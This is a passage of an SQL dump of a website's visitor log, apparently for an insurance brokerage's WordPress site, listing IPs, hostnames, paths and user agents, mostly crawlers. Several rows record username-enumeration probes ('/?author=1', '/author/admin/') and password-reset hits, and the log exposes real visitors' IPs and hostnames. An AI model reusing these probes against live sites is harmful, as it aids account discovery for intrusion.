(Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(20324,'0b_e4845c3e2f259e202d139ec89a737737','1461309182','207.46.13.139','msnbot-207-46-13-139.search.msn.com','/carriers','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20327,'0b_e4845c3e2f259e202d139ec89a737737','1461309305','207.46.13.139','msnbot-207-46-13-139.search.msn.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20328,'0b_45e63d5678c0558b8f47128a52586521','1461311871','130.185.155.10','130.185.155.10','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(20331,'0b_45e63d5678c0558b8f47128a52586521','1461311881','130.185.155.10','130.185.155.10','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(20333,'0b_45e63d5678c0558b8f47128a52586521','1461311892','130.185.155.10','130.185.155.10','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(20334,'0b_8bbb8c5266a758e539fc9673a09ce303','1461313991','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(20336,'0b_77982099041cc387f69b44e35d40daa5','1461313992','141.8.143.235','spider-141-8-143-235.yandex.com','/agent-tools/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(20339,'0b_77982099041cc387f69b44e35d40daa5','1461314116','141.8.143.235','spider-141-8-143-235.yandex.com','/case-status/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(20342,'0b_5ecaf7a1f5f5d336ac29bb7cec058f49','1461315967','207.46.13.59','msnbot-207-46-13-59.search.msn.com','/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20343,'0b_ee2e3d066da93b81f2a5e52bc5e66f1f','1461316905','157.55.39.107','msnbot-157-55-39-107.search.msn.com','/SSO/235_38.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20345,'0b_0d6d579d5375ba1376d5012bc43fc5b8','1461319327','180.76.15.10','baiduspider-180-76-15-10.crawl.baidu.com','/register/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(20348,'0b_113a05cb3bd475c3d1dc79e03da4d475','1461325460','100.43.81.146','spider-100-43-81-146.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(20351,'0b_a40b0e85a81d5c6899a10f6f6e6d1c8d','1461326992','212.83.39.225','TASK2','/','','','',0,'','','us','','','Unknown Spider','','','','0','0',0),(20352,'0b_a75b7fd756e23a9dcac863d3f1f7ac38','1461327761','40.77.167.84','msnbot-40-77-167-84.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20355,'0b_6a0e39c5977562eda15e3780dda15124','1461327761','207.46.13.53','msnbot-207-46-13-53.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20358,'0b_28175ade14a16bde3166eeb2c4b639e0','1461328897','131.253.25.239','msnbot-131-253-25-239.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b','http://www.empireins.com/','',0,'Win7','BingPreview 1','','','','BingBot','','','','0','0',0),(20360,'0b_3f70688535378bd7407b2abe6ae5ec54','1461328918','40.77.167.84','msnbot-40-77-167-84.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20361,'0b_011b0c4396952cd773d5e8c8bd7e1f72','1461330270','40.77.167.84','msnbot-40-77-167-84.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20364,'0b_56d790d5c67c0e2c27bdc74ed5bdf2f2','1461332411','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20367,'0b_cdad9172edd13612ad407c92cb62a024','1461334774','220.181.108.146','220.181.108.146','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(20370,'0b_eca4910897cf931e5daedfa25c941f3e','1461337294','173.161.170.210','smail.rockwoodinsurance.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(20373,'0b_eca4910897cf931e5daedfa25c941f3e','1461337294','173.161.170.210','smail.rockwoodinsurance.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(20375,'0b_eca4910897cf931e5daedfa25c941f3e','1461337297','173.161.170.210','smail.rockwoodinsurance.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20376,'0b_eca4910897cf931e5daedfa25c941f3e','1461337302','173.161.170.210','smail.rockwoodinsurance.com','/about-us/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(20378,'0b_eca4910897cf931e5daedfa25c941f3e','1461337333','173.161.170.210','smail.rockwoodinsurance.com','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(20379,'0b_2e1f37b9a05d743a55159a8531659064','1461337453','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20382,'0b_2e1f37b9a05d743a55159a8531659064','1461337456','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20384,'0b_2e1f37b9a05d743a55159a8531659064','1461337461','69.175.67.58','newscan04.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20387,'0b_2e1f37b9a05d743a55159a8531659064','1461337474','69.175.67.58','newscan04.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20388,'0b_2e1f37b9a05d743a55159a8531659064','1461337477','69.175.67.58','newscan04.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20391,'0b_c587a75929097531d33060970b7f7a1e','1461341164','85.114.135.26','bs1.moj-web.com','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(20394,'0b_c587a75929097531d33060970b7f7a1e','1461341164','85.114.135.26','bs1.moj-web.com','/?author=0','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(20396,'0b_c587a75929097531d33060970b7f7a1e','1461341164','85.114.135.26','bs1.moj-web.com','/?author=4','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(20397,'0b_daba52a1320ce9a13561947d7f9d1c33','1461348915','156.211.170.88','host-156.211.88.170-static.tedata.net','/?author=1','Opera/9.00 (Windows NT 5.0; U; en)','http://empireins.com/','',0,'Win2000','Opera 9','us','','','','','','','0','0',0),(20399,'0b_42e75e2bd4fd28d0a857878f1e3ee5cc','1461350261','207.46.13.76','msnbot-207-46-13-76.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20400,'0b_42e75e2bd4fd28d0a857878f1e3ee5cc','1461350261','207.46.13.76','msnbot-207-46-13-76.search.msn.com','/SSO/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20402,'0b_805f46f2df5014bb35aa34642c7e0d20','1461351566','66.249.73.202','crawl-66-249-73-202.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20405,'0b_4b243fcf673e9b84891673ec27289eea','1461351568','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(20406,'0b_5b8f6213367ece748f8ebcfe5a83f697','1461352056','66.249.73.196','crawl-66-249-73-196.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20409,'0b_5b8f6213367ece748f8ebcfe5a83f697','1461352072','66.249.73.179','crawl-66-249-73-179.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20412,'0b_5ad5975fe74db6a827b3aeab3e04aa2d','1461352744','180.76.15.146','baiduspider-180-76-15-146.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(20415,'0b_360180603f8ef6d8fc498ab7b37acd40','1461353452','83.149.126.98','83.149.126.98','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(20417,'0b_360180603f8ef6d8fc498ab7b37acd40','1461353464','83.149.126.98','83.149.126.98','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(20420,'0b_16a4ee6ebc89cf524d594a7139008609','1461355057','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(20421,'0b_16a4ee6ebc89cf524d594a7139008609','1461355059','68.180.230.123','b115363.yse.yahoo.net','/case-status/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(20423,'0b_e44ae7623bcba099c1960a1c87deb360','1461363151','40.77.167.58','msnbot-40-77-167-58.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20426,'0b_7314a15577859effc1843ba69157ff8b','1461365907','40.77.167.58','msnbot-40-77-167-58.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20429,'0b_4773d13bc993f316c6abb16414e5a593','1461365916','157.55.39.182','msnbot-157-55-39-182.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20430,'0b_7314a15577859effc1843ba69157ff8b','1461365917','40.77.167.58','msnbot-40-77-167-58.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20433,'0b_455191515fb280809ced634facfb8b7c','1461371443','130.185.155.82','130.185.155.82','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(20436,'0b_455191515fb280809ced634facfb8b7c','1461371453','130.185.155.82','130.185.155.82','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(20438,'0b_455191515fb280809ced634facfb8b7c','1461371463','130.185.155.82','130.185.155.82','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(20441,'0b_177f5a0f7ca4256e15ee435cc848db83','1461373184','66.249.73.187','crawl-66-249-73-187.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20444,'0b_177f5a0f7ca4256e15ee435cc848db83','1461373185','66.249.73.169','crawl-66-249-73-169.googlebot.com','/term-quotes/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20445,'0b_d907826e32bf9ecbb61a2bbfb1584180','1461373708','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20447,'0b_2b90f65a1ef1ed9549245ca07a682500','1461373824','40.77.167.66','msnbot-40-77-167-66.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20450,'0b_cac44b1b977b979f108e5bfda611b93c','1461376188','66.249.73.202','crawl-66-249-73-202.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20453,'0b_64023e45fb845c836e9d8cdc71bf71b5','1461380573','157.55.39.182','msnbot-157-55-39-182.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20454,'0b_2bdf580e4d41c319d0cd67791114d055','1461389371','180.76.15.161','baiduspider-180-76-15-161.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(20457,'0b_2554bcfff685d42a07707c0d45ef3570','1461394861','66.249.73.169','crawl-66-249-73-169.googlebot.com','/about-us/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20459,'0b_412b5e5fb44e68c62da930220d0ed4a7','1461394857','188.166.44.62','188.166.44.62','/robots.txt','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(20460,'0b_412b5e5fb44e68c62da930220d0ed4a7','1461394863','188.166.44.62','188.166.44.62','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(20462,'0b_2554bcfff685d42a07707c0d45ef3570','1461395004','66.249.73.178','crawl-66-249-73-178.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20463,'0b_c54bf610620601da6e4d1e2fb8245ce0','1461396841','207.46.13.103','msnbot-207-46-13-103.search.msn.com','/SSO/235_38.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20466,'0b_f67c005d4bd50eff3ce39b7609dc48ee','1461399452','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20468,'0b_e4ea8fe5e9654032e6d94b40d9589def','1461403166','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://vpnhowto.info/node/78','',0,'Windows','IE 6','','','','','','','','0','0',0),(20471,'0b_e4ea8fe5e9654032e6d94b40d9589def','1461403166','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://vpnhowto.info/node/78','',0,'Windows','IE 6','','','','','','','','0','0',0),(20474,'0b_b64eada01451d2923affc7c2a57960dd','1461405002','207.46.13.103','msnbot-207-46-13-103.search.msn.com','/SSO/235_38.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20477,'0b_bbe5a231dee622ca5688ca705c42ddba','1461407103','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(20478,'0b_bbe5a231dee622ca5688ca705c42ddba','1461407104','178.255.215.70','crawl06.exabot.com','/term-quotes/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(20480,'0b_e85f9f25b24baa51c4e2a48da0afbfd3','1461409505','178.255.215.70','crawl06.exabot.com','/term-quotes/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(20481,'0b_e85f9f25b24baa51c4e2a48da0afbfd3','1461409506','178.255.215.70','crawl06.exabot.com','/?p=309','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(20484,'0b_e85f9f25b24baa51c4e2a48da0afbfd3','1461409509','178.255.215.70','crawl06.exabot.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(20486,'0b_cde50aaaa0e03c45dc37ace6dbfcbec6','1461413371','41.45.134.129','host-41.45.134.129.tedata.net','/?author=1','Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.6','http://empireins.com/','',0,'','Lynx 2','us','','','Lynx','','','','0','0',0),(20487,'0b_2c4391e1a14bda3d79efaee7ac7e07d7','1461413752','107.172.206.13','107-172-206-13-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 39','us','','','','','','','0','0',0),(20490,'0b_c209d7b0f9e442672193403ac1fbd85c','1461415139','177.200.80.174','177.200.80.174','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','','','','','','','','0','0',0),(20492,'0b_cc5813f56ac9cd9b6fac1d4b73bb849b','1461415655','157.55.39.252','msnbot-157-55-39-252.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20493,'0b_4e4f0787f98528a04f821bb1ba6ed52c','1461422294','180.76.15.134','baiduspider-180-76-15-134.crawl.baidu.com','/forms/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(20495,'0b_0617eba39a1bd09a9ec8a06dfc66639a','1461423695','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20498,'0b_0617eba39a1bd09a9ec8a06dfc66639a','1461423699','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20501,'0b_0617eba39a1bd09a9ec8a06dfc66639a','1461423703','69.175.67.58','newscan04.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20504,'0b_0617eba39a1bd09a9ec8a06dfc66639a','1461423706','69.175.67.58','newscan04.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20505,'0b_0617eba39a1bd09a9ec8a06dfc66639a','1461423708','69.175.67.58','newscan04.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20508,'0b_5d4cc188d6d7866238df565ccb75228e','1461424281','213.111.196.45','45.196-pool.nikopol.net','/?author=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36','http://empireins.com/?author=1','',0,'Win7','Chrome 31','ru','','','','','','','0','0',0),(20510,'0b_677a4ca385b512da5dc7f7e67a4c6d70','1461425035','157.55.39.231','msnbot-157-55-39-231.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20511,'0b_b1653ffd5b9186007ef49ef1956e4f4d','1461425476','69.30.213.18','mta8.offreslash.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(20513,'0b_b1653ffd5b9186007ef49ef1956e4f4d','1461425478','69.30.213.18','mta8.offreslash.com','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(20516,'0b_b1653ffd5b9186007ef49ef1956e4f4d','1461425481','69.30.213.18','mta8.offreslash.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(20519,'0b_c73e34e8765eb3983fcab9caca19edf3','1461426127','66.249.66.18','crawl-66-249-66-18.googlebot.com','/about-us/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20522,'0b_2031aa7daf667e49ec7727a07152b62d','1461426251','51.254.129.9','9.ip-51-254-129.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(20525,'0b_2031aa7daf667e49ec7727a07152b62d','1461426258','51.254.129.9','9.ip-51-254-129.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(20526,'0b_0317ae75ba2ef8fdc81040595f171bd1','1461427260','66.249.66.12','crawl-66-249-66-12.googlebot.com','/illustration.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20528,'0b_d545a58683840939c22191506a462c7e','1461430298','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(20529,'0b_fa248b45dd5519653b209f943211eea4','1461432970','5.9.89.170','static.170.89.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(20531,'0b_fa248b45dd5519653b209f943211eea4','1461432972','5.9.89.170','static.170.89.9.5.clients.your-server.de','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(20534,'0b_fa248b45dd5519653b209f943211eea4','1461432975','5.9.89.170','static.170.89.9.5.clients.your-server.de','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(20535,'0b_fa248b45dd5519653b209f943211eea4','1461432980','5.9.89.170','static.170.89.9.5.clients.your-server.de','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(20538,'0b_fa248b45dd5519653b209f943211eea4','1461432982','5.9.89.170','static.170.89.9.5.clients.your-server.de','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(20540,'0b_fa248b45dd5519653b209f943211eea4','1461432984','5.9.89.170','static.170.89.9.5.clients.your-server.de','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(20543,'0b_a636f2e5c87e869a2b01bf806332a5f4','1461434947','157.55.39.253','msnbot-157-55-39-253.search.msn.com','/agent-tools/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone 